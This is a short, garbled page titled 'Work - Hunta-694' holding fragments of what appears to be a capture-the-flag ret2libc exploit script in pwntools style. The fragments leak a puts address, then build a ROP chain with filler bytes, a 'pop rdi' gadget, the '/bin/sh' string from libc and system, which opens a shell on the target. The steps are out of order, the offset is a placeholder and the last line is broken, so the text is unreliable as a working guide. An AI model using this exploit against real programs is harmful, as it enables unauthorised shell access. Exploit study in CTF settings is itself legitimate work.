Work - Hunta-694

# ---- Step 3: Build final ROP chain -------------------------------- pop_rdi = (rop.find_gadget(['pop rdi', 'ret']))[0] bin_sh = next(libc.search(b'/bin/sh')) system = libc.symbols['system']

# ---- Step 1: Leak an address (example: puts@GLIBC) ----------------- offset = <offset_to_ret> puts_plt = ELF.plt['puts'] puts_got = ELF.got['puts'] main_addr = ELF.symbols['main'] hunta-694

# Payload assembled with flat(): `offset` bytes of filler (the page's
# `offset_to_ret` naming suggests this reaches the saved return address —
# not verifiable here), followed by the three values computed in Step 3.
rop_payload = flat(
    b'A' * offset,
    pop_rdi,
    bin_sh,
    system
)
# Write the payload to the `io` connection after the prompt b'> ' arrives.
# `io` and `flat` are not defined in the visible text.
io.sendlineafter(b'> ', rop_payload)

$ ./exploit.py | tee flag.txt or within the interactive session: system ) io.sendlineafter(b'> '